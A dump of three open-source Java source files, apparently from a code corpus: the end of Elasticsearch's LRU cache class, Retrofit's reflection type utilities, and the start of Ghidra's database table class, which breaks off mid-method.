Entry<K, V> entry = f.get();
lruLock.lock();
try {
delete(entry, RemovalNotification.RemovalReason.INVALIDATED);
} finally {
lruLock.unlock();
}
} catch (ExecutionException e) {
// ok
} catch (InterruptedException e) {
throw new IllegalStateException(e);
}
}
/**
* Invalidate the association for the specified key. A removal notification will be issued for invalidated
* entries with {@link org.elasticsearch.common.cache.RemovalNotification.RemovalReason} INVALIDATED.
*
* @param key the key whose mapping is to be invalidated from the cache
*/
public void invalidate(K key) {
CacheSegment segment = getCacheSegment(key);
segment.remove(key);
}
/**
* Invalidate the entry for the specified key and value. If the value provided is not equal to the value in
* the cache, no removal will occur. A removal notification will be issued for invalidated
* entries with {@link org.elasticsearch.common.cache.RemovalNotification.RemovalReason} INVALIDATED.
*
* @param key the key whose mapping is to be invalidated from the cache
* @param value the expected value that should be associated with the key
*/
public void invalidate(K key, V value) {
CacheSegment segment = getCacheSegment(key);
segment.remove(key, value, true);
}
/**
* Invalidate all cache entries. A removal notification will be issued for invalidated entries with
* {@link org.elasticsearch.common.cache.RemovalNotification.RemovalReason} INVALIDATED.
*/
public void invalidateAll() {
Entry<K, V> h;
boolean[] haveSegmentLock = new boolean[NUMBER_OF_SEGMENTS];
lruLock.lock();
try {
try {
for (int i = 0; i < NUMBER_OF_SEGMENTS; i++) {
segments[i].segmentLock.writeLock().lock();
haveSegmentLock[i] = true;
}
h = head;
for (CacheSegment segment : segments) {
segment.map = null;
}
Entry<K, V> current = head;
while (current != null) {
current.state = State.DELETED;
current = current.after;
}
head = tail = null;
count = 0;
weight = 0;
} finally {
for (int i = NUMBER_OF_SEGMENTS - 1; i >= 0; i--) {
if (haveSegmentLock[i]) {
segments[i].segmentLock.writeLock().unlock();
}
}
}
} finally {
lruLock.unlock();
}
while (h != null) {
removalListener.onRemoval(new RemovalNotification<>(h.key, h.value, RemovalNotification.RemovalReason.INVALIDATED));
h = h.after;
}
}
/**
* Force any outstanding size-based and time-based evictions to occur
*/
public void refresh() {
long now = now();
lruLock.lock();
try {
evict(now);
} finally {
lruLock.unlock();
}
}
/**
* The number of entries in the cache.
*
* @return the number of entries in the cache
*/
public int count() {
return count;
}
/**
* The weight of the entries in the cache.
*
* @return the weight of the entries in the cache
*/
public long weight() {
return weight;
}
/**
* An LRU sequencing of the keys in the cache that supports removal. This sequence is not protected from mutations
* to the cache (except for {@link Iterator#remove()}. The result of iteration under any other mutation is
* undefined.
*
* @return an LRU-ordered {@link Iterable} over the keys in the cache
*/
public Iterable<K> keys() {
return () -> new Iterator<>() {
private final CacheIterator iterator = new CacheIterator(head);
@Override
public boolean hasNext() {
return iterator.hasNext();
}
@Override
public K next() {
return iterator.next().key;
}
@Override
public void remove() {
iterator.remove();
}
};
}
/**
* An LRU sequencing of the values in the cache. This sequence is not protected from mutations
* to the cache (except for {@link Iterator#remove()}. The result of iteration under any other mutation is
* undefined.
*
* @return an LRU-ordered {@link Iterable} over the values in the cache
*/
public Iterable<V> values() {
return () -> new Iterator<>() {
private final CacheIterator iterator = new CacheIterator(head);
@Override
public boolean hasNext() {
return iterator.hasNext();
}
@Override
public V next() {
return iterator.next().value;
}
@Override
public void remove() {
iterator.remove();
}
};
}
/**
* Performs an action for each cache entry in the cache. While iterating over the cache entries this method is protected from mutations
* that occurs within the same cache segment by acquiring the segment's read lock during all the iteration. As such, the specified
* consumer should not try to modify the cache. Modifications that occur in already traveled segments won't been seen by the consumer
* but modification that occur in non yet traveled segments should be.
*
* @param consumer the {@link Consumer}
*/
public void forEach(BiConsumer<K, V> consumer) {
for (CacheSegment segment : segments) {
segment.readLock.lock();
try {
if (segment.map == null) {
continue;
}
for (CompletableFuture<Entry<K, V>> future : segment.map.values()) {
try {
if (future != null && future.isDone()) {
final Entry<K, V> entry = future.get();
consumer.accept(entry.key, entry.value);
}
} catch (ExecutionException | InterruptedException e) {
throw new IllegalStateException(e);
}
}
} finally {
segment.readLock.unlock();
}
}
}
private class CacheIterator implements Iterator<Entry<K, V>> {
private Entry<K, V> current;
private Entry<K, V> next;
CacheIterator(Entry<K, V> head) {
current = null;
next = head;
}
@Override
public boolean hasNext() {
return next != null;
}
@Override
public Entry<K, V> next() {
current = next;
next = next.after;
return current;
}
@Override
public void remove() {
Entry<K, V> entry = current;
if (entry != null) {
CacheSegment segment = getCacheSegment(entry.key);
segment.remove(entry.key, entry.value, false);
lruLock.lock();
try {
current = null;
delete(entry, RemovalNotification.RemovalReason.INVALIDATED);
} finally {
lruLock.unlock();
}
}
}
}
/**
* The cache statistics tracking hits, misses and evictions. These are taken on a best-effort basis meaning that
* they could be out-of-date mid-flight.
*
* @return the current cache statistics
*/
public CacheStats stats() {
return new CacheStats(this.hits.sum(), misses.sum(), evictions.sum());
}
public static class CacheStats {
private final long hits;
private final long misses;
private final long evictions;
public CacheStats(long hits, long misses, long evictions) {
this.hits = hits;
this.misses = misses;
this.evictions = evictions;
}
public long getHits() {
return hits;
}
public long getMisses() {
return misses;
}
public long getEvictions() {
return evictions;
}
}
private void promote(Entry<K, V> entry, long now) {
boolean promoted = true;
lruLock.lock();
try {
switch (entry.state) {
case DELETED -> promoted = false;
case EXISTING -> relinkAtHead(entry);
case NEW -> linkAtHead(entry);
}
if (promoted) {
evict(now);
}
} finally {
lruLock.unlock();
}
}
private void evict(long now) {
assert lruLock.isHeldByCurrentThread();
while (tail != null && shouldPrune(tail, now)) {
evictEntry(tail);
}
}
private void evictEntry(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
CacheSegment segment = getCacheSegment(entry.key);
if (segment != null) {
segment.remove(entry.key, entry.value, false);
}
delete(entry, RemovalNotification.RemovalReason.EVICTED);
}
private void delete(Entry<K, V> entry, RemovalNotification.RemovalReason removalReason) {
assert lruLock.isHeldByCurrentThread();
if (unlink(entry)) {
removalListener.onRemoval(new RemovalNotification<>(entry.key, entry.value, removalReason));
}
}
private boolean shouldPrune(Entry<K, V> entry, long now) {
return exceedsWeight() || isExpired(entry, now);
}
private boolean exceedsWeight() {
return maximumWeight != -1 && weight > maximumWeight;
}
private boolean isExpired(Entry<K, V> entry, long now) {
return (entriesExpireAfterAccess && now - entry.accessTime > expireAfterAccessNanos)
|| (entriesExpireAfterWrite && now - entry.writeTime > expireAfterWriteNanos);
}
private boolean unlink(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
if (entry.state == State.EXISTING) {
final Entry<K, V> before = entry.before;
final Entry<K, V> after = entry.after;
if (before == null) {
// removing the head
assert head == entry;
head = after;
if (head != null) {
head.before = null;
}
} else {
// removing inner element
before.after = after;
entry.before = null;
}
if (after == null) {
// removing tail
assert tail == entry;
tail = before;
if (tail != null) {
tail.after = null;
}
} else {
// removing inner element
after.before = before;
entry.after = null;
}
count--;
weight -= weigher.applyAsLong(entry.key, entry.value);
entry.state = State.DELETED;
return true;
} else {
return false;
}
}
private void linkAtHead(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
Entry<K, V> h = head;
entry.before = null;
entry.after = head;
head = entry;
if (h == null) {
tail = entry;
} else {
h.before = entry;
}
count++;
weight += weigher.applyAsLong(entry.key, entry.value);
entry.state = State.EXISTING;
}
private void relinkAtHead(Entry<K, V> entry) {
assert lruLock.isHeldByCurrentThread();
if (head != entry) {
unlink(entry);
linkAtHead(entry);
}
}
private CacheSegment getCacheSegment(K key) {
return segments[key.hashCode() & 0xff];
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/common/cache/Cache.java |
1,105 | /*
* Copyright (C) 2008 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package retrofit2;
import java.io.IOException;
import java.lang.annotation.Annotation;
import java.lang.reflect.Array;
import java.lang.reflect.GenericArrayType;
import java.lang.reflect.GenericDeclaration;
import java.lang.reflect.Method;
import java.lang.reflect.ParameterizedType;
import java.lang.reflect.Type;
import java.lang.reflect.TypeVariable;
import java.lang.reflect.WildcardType;
import java.util.Arrays;
import java.util.NoSuchElementException;
import java.util.Objects;
import javax.annotation.Nullable;
import kotlin.Unit;
import okhttp3.ResponseBody;
import okio.Buffer;
final class Utils {
static final Type[] EMPTY_TYPE_ARRAY = new Type[0];
private Utils() {
// No instances.
}
static RuntimeException methodError(Method method, String message, Object... args) {
return methodError(method, null, message, args);
}
@SuppressWarnings("AnnotateFormatMethod")
static RuntimeException methodError(
Method method, @Nullable Throwable cause, String message, Object... args) {
message = String.format(message, args);
return new IllegalArgumentException(
message
+ "\n for method "
+ method.getDeclaringClass().getSimpleName()
+ "."
+ method.getName(),
cause);
}
static RuntimeException parameterError(
Method method, Throwable cause, int p, String message, Object... args) {
String paramDesc = Platform.reflection.describeMethodParameter(method, p);
return methodError(method, cause, message + " (" + paramDesc + ")", args);
}
static RuntimeException parameterError(Method method, int p, String message, Object... args) {
String paramDesc = Platform.reflection.describeMethodParameter(method, p);
return methodError(method, message + " (" + paramDesc + ")", args);
}
static Class<?> getRawType(Type type) {
Objects.requireNonNull(type, "type == null");
if (type instanceof Class<?>) {
// Type is a normal class.
return (Class<?>) type;
}
if (type instanceof ParameterizedType) {
ParameterizedType parameterizedType = (ParameterizedType) type;
// I'm not exactly sure why getRawType() returns Type instead of Class. Neal isn't either but
// suspects some pathological case related to nested classes exists.
Type rawType = parameterizedType.getRawType();
if (!(rawType instanceof Class)) throw new IllegalArgumentException();
return (Class<?>) rawType;
}
if (type instanceof GenericArrayType) {
Type componentType = ((GenericArrayType) type).getGenericComponentType();
return Array.newInstance(getRawType(componentType), 0).getClass();
}
if (type instanceof TypeVariable) {
// We could use the variable's bounds, but that won't work if there are multiple. Having a raw
// type that's more general than necessary is okay.
return Object.class;
}
if (type instanceof WildcardType) {
return getRawType(((WildcardType) type).getUpperBounds()[0]);
}
throw new IllegalArgumentException(
"Expected a Class, ParameterizedType, or "
+ "GenericArrayType, but <"
+ type
+ "> is of type "
+ type.getClass().getName());
}
/** Returns true if {@code a} and {@code b} are equal. */
static boolean equals(Type a, Type b) {
if (a == b) {
return true; // Also handles (a == null && b == null).
} else if (a instanceof Class) {
return a.equals(b); // Class already specifies equals().
} else if (a instanceof ParameterizedType) {
if (!(b instanceof ParameterizedType)) return false;
ParameterizedType pa = (ParameterizedType) a;
ParameterizedType pb = (ParameterizedType) b;
Object ownerA = pa.getOwnerType();
Object ownerB = pb.getOwnerType();
boolean ownersAreEqual = ownerA == ownerB || (ownerA != null && ownerA.equals(ownerB));
boolean rawTypesAreEqual = pa.getRawType().equals(pb.getRawType());
boolean typeArgumentsAreEqual =
Arrays.equals(pa.getActualTypeArguments(), pb.getActualTypeArguments());
return ownersAreEqual && rawTypesAreEqual && typeArgumentsAreEqual;
} else if (a instanceof GenericArrayType) {
if (!(b instanceof GenericArrayType)) return false;
GenericArrayType ga = (GenericArrayType) a;
GenericArrayType gb = (GenericArrayType) b;
return equals(ga.getGenericComponentType(), gb.getGenericComponentType());
} else if (a instanceof WildcardType) {
if (!(b instanceof WildcardType)) return false;
WildcardType wa = (WildcardType) a;
WildcardType wb = (WildcardType) b;
return Arrays.equals(wa.getUpperBounds(), wb.getUpperBounds())
&& Arrays.equals(wa.getLowerBounds(), wb.getLowerBounds());
} else if (a instanceof TypeVariable) {
if (!(b instanceof TypeVariable)) return false;
TypeVariable<?> va = (TypeVariable<?>) a;
TypeVariable<?> vb = (TypeVariable<?>) b;
return va.getGenericDeclaration() == vb.getGenericDeclaration()
&& va.getName().equals(vb.getName());
} else {
return false; // This isn't a type we support!
}
}
/**
* Returns the generic supertype for {@code supertype}. For example, given a class {@code
* IntegerSet}, the result for when supertype is {@code Set.class} is {@code Set<Integer>} and the
* result when the supertype is {@code Collection.class} is {@code Collection<Integer>}.
*/
static Type getGenericSupertype(Type context, Class<?> rawType, Class<?> toResolve) {
if (toResolve == rawType) return context;
// We skip searching through interfaces if unknown is an interface.
if (toResolve.isInterface()) {
Class<?>[] interfaces = rawType.getInterfaces();
for (int i = 0, length = interfaces.length; i < length; i++) {
if (interfaces[i] == toResolve) {
return rawType.getGenericInterfaces()[i];
} else if (toResolve.isAssignableFrom(interfaces[i])) {
return getGenericSupertype(rawType.getGenericInterfaces()[i], interfaces[i], toResolve);
}
}
}
// Check our supertypes.
if (!rawType.isInterface()) {
while (rawType != Object.class) {
Class<?> rawSupertype = rawType.getSuperclass();
if (rawSupertype == toResolve) {
return rawType.getGenericSuperclass();
} else if (toResolve.isAssignableFrom(rawSupertype)) {
return getGenericSupertype(rawType.getGenericSuperclass(), rawSupertype, toResolve);
}
rawType = rawSupertype;
}
}
// We can't resolve this further.
return toResolve;
}
private static int indexOf(Object[] array, Object toFind) {
for (int i = 0; i < array.length; i++) {
if (toFind.equals(array[i])) return i;
}
throw new NoSuchElementException();
}
static String typeToString(Type type) {
return type instanceof Class ? ((Class<?>) type).getName() : type.toString();
}
/**
* Returns the generic form of {@code supertype}. For example, if this is {@code
* ArrayList<String>}, this returns {@code Iterable<String>} given the input {@code
* Iterable.class}.
*
* @param supertype a superclass of, or interface implemented by, this.
*/
static Type getSupertype(Type context, Class<?> contextRawType, Class<?> supertype) {
if (!supertype.isAssignableFrom(contextRawType)) throw new IllegalArgumentException();
return resolve(
context, contextRawType, getGenericSupertype(context, contextRawType, supertype));
}
static Type resolve(Type context, Class<?> contextRawType, Type toResolve) {
// This implementation is made a little more complicated in an attempt to avoid object-creation.
while (true) {
if (toResolve instanceof TypeVariable) {
TypeVariable<?> typeVariable = (TypeVariable<?>) toResolve;
toResolve = resolveTypeVariable(context, contextRawType, typeVariable);
if (toResolve == typeVariable) {
return toResolve;
}
} else if (toResolve instanceof Class && ((Class<?>) toResolve).isArray()) {
Class<?> original = (Class<?>) toResolve;
Type componentType = original.getComponentType();
Type newComponentType = resolve(context, contextRawType, componentType);
return componentType == newComponentType
? original
: new GenericArrayTypeImpl(newComponentType);
} else if (toResolve instanceof GenericArrayType) {
GenericArrayType original = (GenericArrayType) toResolve;
Type componentType = original.getGenericComponentType();
Type newComponentType = resolve(context, contextRawType, componentType);
return componentType == newComponentType
? original
: new GenericArrayTypeImpl(newComponentType);
} else if (toResolve instanceof ParameterizedType) {
ParameterizedType original = (ParameterizedType) toResolve;
Type ownerType = original.getOwnerType();
Type newOwnerType = resolve(context, contextRawType, ownerType);
boolean changed = newOwnerType != ownerType;
Type[] args = original.getActualTypeArguments();
for (int t = 0, length = args.length; t < length; t++) {
Type resolvedTypeArgument = resolve(context, contextRawType, args[t]);
if (resolvedTypeArgument != args[t]) {
if (!changed) {
args = args.clone();
changed = true;
}
args[t] = resolvedTypeArgument;
}
}
return changed
? new ParameterizedTypeImpl(newOwnerType, original.getRawType(), args)
: original;
} else if (toResolve instanceof WildcardType) {
WildcardType original = (WildcardType) toResolve;
Type[] originalLowerBound = original.getLowerBounds();
Type[] originalUpperBound = original.getUpperBounds();
if (originalLowerBound.length == 1) {
Type lowerBound = resolve(context, contextRawType, originalLowerBound[0]);
if (lowerBound != originalLowerBound[0]) {
return new WildcardTypeImpl(new Type[] {Object.class}, new Type[] {lowerBound});
}
} else if (originalUpperBound.length == 1) {
Type upperBound = resolve(context, contextRawType, originalUpperBound[0]);
if (upperBound != originalUpperBound[0]) {
return new WildcardTypeImpl(new Type[] {upperBound}, EMPTY_TYPE_ARRAY);
}
}
return original;
} else {
return toResolve;
}
}
}
private static Type resolveTypeVariable(
Type context, Class<?> contextRawType, TypeVariable<?> unknown) {
Class<?> declaredByRaw = declaringClassOf(unknown);
// We can't reduce this further.
if (declaredByRaw == null) return unknown;
Type declaredBy = getGenericSupertype(context, contextRawType, declaredByRaw);
if (declaredBy instanceof ParameterizedType) {
int index = indexOf(declaredByRaw.getTypeParameters(), unknown);
return ((ParameterizedType) declaredBy).getActualTypeArguments()[index];
}
return unknown;
}
/**
* Returns the declaring class of {@code typeVariable}, or {@code null} if it was not declared by
* a class.
*/
private static @Nullable Class<?> declaringClassOf(TypeVariable<?> typeVariable) {
GenericDeclaration genericDeclaration = typeVariable.getGenericDeclaration();
return genericDeclaration instanceof Class ? (Class<?>) genericDeclaration : null;
}
static void checkNotPrimitive(Type type) {
if (type instanceof Class<?> && ((Class<?>) type).isPrimitive()) {
throw new IllegalArgumentException();
}
}
/** Returns true if {@code annotations} contains an instance of {@code cls}. */
static boolean isAnnotationPresent(Annotation[] annotations, Class<? extends Annotation> cls) {
for (Annotation annotation : annotations) {
if (cls.isInstance(annotation)) {
return true;
}
}
return false;
}
static ResponseBody buffer(final ResponseBody body) throws IOException {
Buffer buffer = new Buffer();
body.source().readAll(buffer);
return ResponseBody.create(body.contentType(), body.contentLength(), buffer);
}
static Type getParameterUpperBound(int index, ParameterizedType type) {
Type[] types = type.getActualTypeArguments();
if (index < 0 || index >= types.length) {
throw new IllegalArgumentException(
"Index " + index + " not in range [0," + types.length + ") for " + type);
}
Type paramType = types[index];
if (paramType instanceof WildcardType) {
return ((WildcardType) paramType).getUpperBounds()[0];
}
return paramType;
}
static Type getParameterLowerBound(int index, ParameterizedType type) {
Type paramType = type.getActualTypeArguments()[index];
if (paramType instanceof WildcardType) {
return ((WildcardType) paramType).getLowerBounds()[0];
}
return paramType;
}
static boolean hasUnresolvableType(@Nullable Type type) {
if (type instanceof Class<?>) {
return false;
}
if (type instanceof ParameterizedType) {
ParameterizedType parameterizedType = (ParameterizedType) type;
for (Type typeArgument : parameterizedType.getActualTypeArguments()) {
if (hasUnresolvableType(typeArgument)) {
return true;
}
}
return false;
}
if (type instanceof GenericArrayType) {
return hasUnresolvableType(((GenericArrayType) type).getGenericComponentType());
}
if (type instanceof TypeVariable) {
return true;
}
if (type instanceof WildcardType) {
return true;
}
String className = type == null ? "null" : type.getClass().getName();
throw new IllegalArgumentException(
"Expected a Class, ParameterizedType, or "
+ "GenericArrayType, but <"
+ type
+ "> is of type "
+ className);
}
static final class ParameterizedTypeImpl implements ParameterizedType {
private final @Nullable Type ownerType;
private final Type rawType;
private final Type[] typeArguments;
ParameterizedTypeImpl(@Nullable Type ownerType, Type rawType, Type... typeArguments) {
// Require an owner type if the raw type needs it.
if (rawType instanceof Class<?>
&& (ownerType == null) != (((Class<?>) rawType).getEnclosingClass() == null)) {
throw new IllegalArgumentException();
}
for (Type typeArgument : typeArguments) {
Objects.requireNonNull(typeArgument, "typeArgument == null");
checkNotPrimitive(typeArgument);
}
this.ownerType = ownerType;
this.rawType = rawType;
this.typeArguments = typeArguments.clone();
}
@Override
public Type[] getActualTypeArguments() {
return typeArguments.clone();
}
@Override
public Type getRawType() {
return rawType;
}
@Override
public @Nullable Type getOwnerType() {
return ownerType;
}
@Override
public boolean equals(Object other) {
return other instanceof ParameterizedType && Utils.equals(this, (ParameterizedType) other);
}
@Override
public int hashCode() {
return Arrays.hashCode(typeArguments)
^ rawType.hashCode()
^ (ownerType != null ? ownerType.hashCode() : 0);
}
@Override
public String toString() {
if (typeArguments.length == 0) return typeToString(rawType);
StringBuilder result = new StringBuilder(30 * (typeArguments.length + 1));
result.append(typeToString(rawType));
result.append("<").append(typeToString(typeArguments[0]));
for (int i = 1; i < typeArguments.length; i++) {
result.append(", ").append(typeToString(typeArguments[i]));
}
return result.append(">").toString();
}
}
private static final class GenericArrayTypeImpl implements GenericArrayType {
private final Type componentType;
GenericArrayTypeImpl(Type componentType) {
this.componentType = componentType;
}
@Override
public Type getGenericComponentType() {
return componentType;
}
@Override
public boolean equals(Object o) {
return o instanceof GenericArrayType && Utils.equals(this, (GenericArrayType) o);
}
@Override
public int hashCode() {
return componentType.hashCode();
}
@Override
public String toString() {
return typeToString(componentType) + "[]";
}
}
/**
* The WildcardType interface supports multiple upper bounds and multiple lower bounds. We only
* support what the Java 6 language needs - at most one bound. If a lower bound is set, the upper
* bound must be Object.class.
*/
private static final class WildcardTypeImpl implements WildcardType {
private final Type upperBound;
private final @Nullable Type lowerBound;
WildcardTypeImpl(Type[] upperBounds, Type[] lowerBounds) {
if (lowerBounds.length > 1) throw new IllegalArgumentException();
if (upperBounds.length != 1) throw new IllegalArgumentException();
if (lowerBounds.length == 1) {
if (lowerBounds[0] == null) throw new NullPointerException();
checkNotPrimitive(lowerBounds[0]);
if (upperBounds[0] != Object.class) throw new IllegalArgumentException();
this.lowerBound = lowerBounds[0];
this.upperBound = Object.class;
} else {
if (upperBounds[0] == null) throw new NullPointerException();
checkNotPrimitive(upperBounds[0]);
this.lowerBound = null;
this.upperBound = upperBounds[0];
}
}
@Override
public Type[] getUpperBounds() {
return new Type[] {upperBound};
}
@Override
public Type[] getLowerBounds() {
return lowerBound != null ? new Type[] {lowerBound} : EMPTY_TYPE_ARRAY;
}
@Override
public boolean equals(Object other) {
return other instanceof WildcardType && Utils.equals(this, (WildcardType) other);
}
@Override
public int hashCode() {
// This equals Arrays.hashCode(getLowerBounds()) ^ Arrays.hashCode(getUpperBounds()).
return (lowerBound != null ? 31 + lowerBound.hashCode() : 1) ^ (31 + upperBound.hashCode());
}
@Override
public String toString() {
if (lowerBound != null) return "? super " + typeToString(lowerBound);
if (upperBound == Object.class) return "?";
return "? extends " + typeToString(upperBound);
}
}
// https://github.com/ReactiveX/RxJava/blob/6a44e5d0543a48f1c378dc833a155f3f71333bc2/
// src/main/java/io/reactivex/exceptions/Exceptions.java#L66
static void throwIfFatal(Throwable t) {
if (t instanceof VirtualMachineError) {
throw (VirtualMachineError) t;
} else if (t instanceof ThreadDeath) {
throw (ThreadDeath) t;
} else if (t instanceof LinkageError) {
throw (LinkageError) t;
}
}
/** Not volatile because we don't mind multiple threads discovering this. */
private static boolean checkForKotlinUnit = true;
static boolean isUnit(Type type) {
if (checkForKotlinUnit) {
try {
return type == Unit.class;
} catch (NoClassDefFoundError ignored) {
checkForKotlinUnit = false;
}
}
return false;
}
}
| square/retrofit | retrofit/src/main/java/retrofit2/Utils.java |
1,117 | /* ###
* IP: GHIDRA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package db;
import java.io.IOException;
import java.util.*;
import db.Field.UnsupportedFieldException;
import ghidra.util.Msg;
import ghidra.util.datastruct.IntObjectHashtable;
import ghidra.util.exception.*;
import ghidra.util.task.TaskMonitor;
/**
* Table implementation class.
* NOTE: Most public methods are synchronized on the associated DBHandle instance
* to prevent concurrent modification by multiple threads.
*/
public class Table {
private DBHandle db;
private TableRecord tableRecord;
private Schema schema;
private NodeMgr nodeMgr;
private int rootBufferId = -1;
private int recordCount;
private long maximumKey;
private IntObjectHashtable<IndexTable> secondaryIndexes = new IntObjectHashtable<>();
private int[] indexedColumns = new int[0];
private boolean isIndexed = false;
/**
* Modification counter
*/
int modCount = 0;
/**
* Construct a new or existing Table.
* @param db database handle
* @param tableRecord master table record for this table.
* @throws UnsupportedFieldException if unsupported schema field encountered
*/
Table(DBHandle db, TableRecord tableRecord) throws UnsupportedFieldException {
this.db = db;
this.tableRecord = tableRecord;
schema = tableRecord.getSchema();
tableRecord.setTable(this);
rootBufferId = tableRecord.getRootBufferId();
recordCount = tableRecord.getRecordCount();
maximumKey = tableRecord.getMaxKey();
nodeMgr = new NodeMgr(this, db.getBufferMgr());
}
/**
* @return the database handle used by this table.
*/
DBHandle getDBHandle() {
return db;
}
/**
* Determine if this table uses long keys.
* @return true if this table utilizes long keys.
*/
public boolean useLongKeys() {
return schema.useLongKeyNodes();
}
/**
* Determine if this table uses FixedField keys.
* @return true if this table utilizes FixedField keys.
*/
public boolean useFixedKeys() {
return schema.useFixedKeyNodes();
}
/**
* Callback notification indicating that the tableRecord has been
* changed by the masterTable. This method is called via the MasterTable
* following an undo or redo.
*/
void tableRecordChanged() {
rootBufferId = tableRecord.getRootBufferId();
recordCount = tableRecord.getRecordCount();
maximumKey = tableRecord.getMaxKey();
++modCount;
}
/**
* Mark table as invalid.
* Subsequent table use may generate an exception.
*/
void invalidate() {
tableRecord = null;
rootBufferId = -1;
nodeMgr = null;
++modCount;
}
/**
* Get this tables master table number.
* @return table number for this table. Each table has a unique table
* number within the master table.
*/
long getTableNum() {
return tableRecord.getTableNum();
}
/**
* Get table statistics.
* @return list of diagnostic statistics data for this table and related index tables.
* @throws IOException database IO error
*/
public TableStatistics[] getAllStatistics() throws IOException {
TableStatistics[] statList = new TableStatistics[indexedColumns.length + 1];
statList[0] = getStatistics();
for (int i = 0; i < indexedColumns.length; i++) {
IndexTable indexTable = secondaryIndexes.get(indexedColumns[i]);
statList[i + 1] = indexTable.getStatistics();
}
return statList;
}
private BTreeNode getBTreeNode(int bufferId) throws IOException {
if (schema.useLongKeyNodes()) {
return nodeMgr.getLongKeyNode(bufferId);
}
if (schema.useFixedKeyNodes()) {
return nodeMgr.getFixedKeyNode(bufferId);
}
return nodeMgr.getVarKeyNode(bufferId);
}
/**
* Get node identified by buffer - must be released by caller (requires DBHandle lock)
* @param bufferId buffer ID
* @return buffer node
* @throws IOException if IO error occurs
*/
private FieldKeyNode getFieldKeyNode(int bufferId) throws IOException {
if (schema.useFixedKeyNodes()) {
return nodeMgr.getFixedKeyNode(bufferId);
}
return nodeMgr.getVarKeyNode(bufferId);
}
/**
* Accumulate node statistics (requires DBHandle lock)
* @param stats statistics collection object
* @param bufferId node buffer ID to examine
* @throws IOException thrown if IO error occurs
*/
private void accumulateNodeStatistics(TableStatistics stats, int bufferId) throws IOException {
if (bufferId < 0) {
return;
}
BTreeNode node = getBTreeNode(bufferId);
++stats.bufferCount;
int[] ids = node.getBufferReferences();
if (node instanceof InteriorNode) {
++stats.interiorNodeCnt;
for (int id : ids) {
accumulateNodeStatistics(stats, id);
}
}
else {
++stats.recordNodeCnt;
for (int id : ids) {
ChainedBuffer dbBuf = new ChainedBuffer(nodeMgr.getBufferMgr(), id);
int cnt = dbBuf.getBufferCount();
stats.chainedBufferCnt += cnt;
stats.bufferCount += cnt;
}
}
nodeMgr.releaseNodes(); // no need to hang on to buffers
}
/**
* Compile table statitics.
* @return table statistics data
* @throws IOException thrown if an IO error occurs
*/
public TableStatistics getStatistics() throws IOException {
synchronized (db) {
TableStatistics stats = new TableStatistics();
stats.name = getName();
try {
accumulateNodeStatistics(stats, rootBufferId);
stats.size = stats.bufferCount * nodeMgr.getBufferMgr().getBufferSize();
}
finally {
nodeMgr.releaseNodes();
}
return stats;
}
}
/**
* Add an existing secondary index.
* NOTE: Records for this table instance must not be modified until
* after all existing secondary indexes are added. Failure to comply may
* result in an inconsistent index.
* @param indexTable secondary index table
*/
void addIndex(IndexTable indexTable) {
secondaryIndexes.put(indexTable.getColumnIndex(), indexTable);
indexedColumns = secondaryIndexes.getKeys();
isIndexed = true;
}
/**
* Callback method for when a new record is added.
* Used for maintaining indexes only. May be called before
* the old record is actually inserted.
* @param record new record which has been added
* @throws IOException thrown if IO error occurs
*/
void insertedRecord(DBRecord record) throws IOException {
// Add secondary index entries for new record
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
indexTable.addEntry(record);
}
}
/**
* Callback method for when an existing record is modified.
* Used for maintaining indexes only. May be called before
* the old record is actually updated.
* @param oldRecord old record
* @param newRecord new record
* @throws IOException thrown if IO error occurs
*/
void updatedRecord(DBRecord oldRecord, DBRecord newRecord) throws IOException {
// Update secondary indexes which have been affected
for (int colIx : indexedColumns) {
Field oldField = oldRecord.getField(colIx);
Field newField = newRecord.getField(colIx);
if (!oldField.equals(newField)) {
IndexTable indexTable = secondaryIndexes.get(colIx);
indexTable.deleteEntry(oldRecord);
indexTable.addEntry(newRecord);
}
}
}
/**
* Callback method for when existing records are deleted.
* Used for maintaining indexes only. May be called before
* the old record is actually deleted.
* @param oldRecord record which has been deleted
* @throws IOException thrown if IO error occurs
*/
void deletedRecord(DBRecord oldRecord) throws IOException {
// Delete secondary index entries
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
indexTable.deleteEntry(oldRecord);
}
}
/**
* Rebuild table and associated indexes to ensure consistent state.
* @param monitor task monitor
* @throws IOException if unable to rebuild
* @throws CancelledException if task was cancelled
*/
public void rebuild(TaskMonitor monitor) throws IOException, CancelledException {
synchronized (db) {
db.checkTransaction();
if (rootBufferId < 0) {
return;
}
try {
BTreeNode rootNode = getBTreeNode(rootBufferId);
if (!rootNode.isConsistent(getName(), monitor)) {
throw new IOException("Low level tree consistency error (" + getName() +
"): Unable to rebuild database");
}
}
catch (IOException t) {
throw new IOException("Low level tree consistency error (" + getName() +
"): failed to fetch root buffer: " + t.getMessage());
}
finally {
nodeMgr.releaseNodes();
}
// Rebuild table indexes
try {
// Remove all index records
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
monitor.setMessage("Clear Index Table " + getName() + "." +
schema.getFieldNames()[indexTable.getColumnIndex()]);
indexTable.indexTable.deleteAll();
}
}
finally {
nodeMgr.releaseNodes();
}
// Determine actual record count, max-key value and rebuild indexes
monitor.setMessage("Rebuild Table " + getName());
int actualCount = 0;
LongField maxKey = null;
try {
RecordIterator recIter = iterator();
while (recIter.hasNext()) {
DBRecord rec = recIter.next();
++actualCount;
Field keyField = rec.getKeyField();
if ((keyField instanceof LongField) &&
